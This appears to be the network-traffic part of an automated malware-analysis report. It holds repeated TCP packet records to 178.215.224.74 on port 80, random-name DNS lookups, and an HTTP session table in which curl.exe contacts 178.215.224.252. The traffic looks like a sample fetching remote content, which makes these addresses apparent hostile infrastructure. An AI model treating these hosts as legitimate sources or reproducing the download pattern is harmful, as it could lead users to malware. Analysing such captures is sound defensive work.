                                        Nov 21, 2024 20:02:16.184461117 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.184503078 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.184601068 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.184669971 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.185302019 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.185395002 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.186167955 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.186206102 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.186275005 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.187020063 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.187063932 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.187077045 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.187138081 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.187834024 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.187944889 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.188644886 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.188688040 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.188781023 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.188822031 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.189483881 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.189678907 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.190239906 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.190457106 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.190521002 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.191185951 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.191226959 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.191293955 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.191334009 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.192075014 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.192182064 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.192841053 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.192883968 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.193124056 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.193162918 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.193687916 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.193797112 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.194256067 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.194493055 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.194602013 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.195301056 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.195341110 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.195415974 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.195450068 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.196135044 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.196235895 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.196966887 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.197007895 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.197077036 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.197118998 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.197787046 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.197854996 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.198235989 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.198571920 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.198668957 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.199382067 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.199491024 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.199588060 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.199588060 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.200216055 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.200258970 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.200325966 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.201015949 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.201287031 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.201870918 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.201925993 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.326781988 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.326872110 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.326988935 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.327023983 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.327040911 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.327099085 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.327773094 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.327883005 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.716346979 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.716388941 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.717041969 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.717304945 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.717582941 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.717856884 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.718065023 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.718580961 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.718688965 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.718733072 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.718769073 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.719506025 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.719569921 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.719717979 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.720278025 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.720407963 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.720444918 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.721093893 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.721218109 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.721462965 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.721909046 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.722023964 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.722112894 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.722733021 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.722747087 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.722798109 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.723552942 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.723654985 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.723695993 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.724344969 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.724461079 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.724510908 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.725164890 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.725255013 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.726001978 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.726044893 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.726100922 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.726136923 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.726847887 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.726922989 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.727150917 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.727622032 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.727746010 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.728127003 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.728423119 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.728540897 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.728579044 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.729266882 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.729444981 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.729499102 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.730062962 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.730128050 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.730357885 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.730873108 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.730953932 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.731291056 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.731709003 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.731865883 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.732175112 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.732599974 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.732659101 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.732920885 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.733325958 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.733403921 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.733459949 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.734131098 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.734220982 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.734952927 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.735008001 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.735028982 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.735068083 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.735960007 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.736005068 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.736346006 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.736639023 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.736720085 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.736800909 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.737396955 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.737536907 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.737749100 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.738251925 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.738370895 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.738409996 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.739089012 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.739171028 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.739252090 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.739895105 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.740005970 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.740173101 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.740648031 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.740693092 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.740732908 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.741478920 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.741614103 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.741786003 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.742428064 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.742641926 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.742677927 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.743127108 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.743323088 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.743370056 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.743928909 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.744004965 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.744265079 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.744736910 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.744782925 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.745569944 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.745609045 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.745668888 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.745702982 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.746355057 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.746572971 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.746612072 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.747178078 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.747253895 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.747361898 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.747994900 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.748058081 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.748121977 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.748933077 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.748991013 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.749037981 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.749671936 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.749865055 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.750503063 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.750511885 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.750524044 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.750561953 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.751305103 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.751389980 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.751554966 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.752151966 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.752264977 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.752304077 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.752918005 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.753062010 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.753688097 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.753693104 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.794090986 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.919199944 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.919285059 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.919367075 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.919790030 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.919843912 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.919881105 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.920429945 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.920442104 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.920489073 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.921238899 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.921248913 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.921283007 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.922099113 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.922187090 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.922225952 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.922879934 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.922960997 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.922992945 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.923677921 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.923795938 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.923832893 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.924503088 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.924576044 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.924607992 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.925318003 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.925405979 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.925446987 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.926141977 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.926153898 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.926192999 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.927118063 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.927133083 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.927185059 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.927758932 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.927845001 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.927884102 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.928627014 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.928741932 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.928778887 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.929415941 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.929533958 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.929636002 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.930205107 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.930305004 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.930345058 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.931052923 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.931063890 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.931107998 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.931843042 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.931935072 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.931969881 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.932771921 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.932876110 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.932910919 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.933480978 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.933577061 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.933617115 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.934267044 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.934377909 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.934415102 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.935128927 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.935161114 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.935194969 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.936002016 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.936084986 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.936130047 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.936747074 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.936837912 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:16.936877966 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:16.937110901 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:17.123663902 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:17.123862028 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:17.215536118 CET8050068178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:17.217936993 CET5006880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:17.340205908 CET8050068178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:17.340351105 CET5006880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:17.925529957 CET5006980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:18.040983915 CET5007080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:18.104645967 CET8050069178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:18.104810953 CET5006980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:18.105129004 CET5006980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:18.160980940 CET8050070178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:18.161122084 CET5007080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:18.161283016 CET5007080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:18.224809885 CET8050069178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:18.283626080 CET8050070178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:19.431052923 CET8050069178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:19.431646109 CET5006980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.483735085 CET8050070178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:19.485172987 CET5007080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.531999111 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.555675983 CET8050069178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:19.555754900 CET5006980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.606347084 CET8050070178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:19.606437922 CET5007080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.651772976 CET8050071178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:19.651946068 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.657141924 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:19.776894093 CET8050071178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:20.537322998 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:20.657218933 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:20.657301903 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:20.657553911 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:20.777272940 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:20.989624977 CET8050071178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:20.989748955 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.111444950 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.232743979 CET8050073178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:21.232954025 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.233371019 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.353815079 CET8050073178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.030884981 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.032632113 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.117845058 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.152532101 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.152712107 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.237382889 CET8050074178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.237462997 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.237582922 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.357147932 CET8050074178.215.224.74192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 19:58:44.892199993 CET | 50084 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 19:58:45.123275042 CET | 53 | 50084 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 20:01:00.978250980 CET | 53 | 59593 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 19:58:44.892199993 CET | 192.168.2.4 | 1.1.1.1 | 0xfe95 | Standard query (0) | mCpLognXwrhUlFWj.mCpLognXwrhUlFWj | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 19:58:45.123275042 CET | 1.1.1.1 | 192.168.2.4 | 0xfe95 | Name error (3) | mCpLognXwrhUlFWj.mCpLognXwrhUlFWj | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 20:01:00.978250980 CET | 1.1.1.1 | 192.168.2.4 | 0x4ebb | Name error (3) | GyxNFpxuLvDE.GyxNFpxuLvDE | none | none | A (IP address) | IN (0x0001) | false
                                        • 178.215.224.252
                                        • 178.215.224.74
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 178.215.224.252 | 80 | 5568 | C:\Windows\SysWOW64\curl.exe

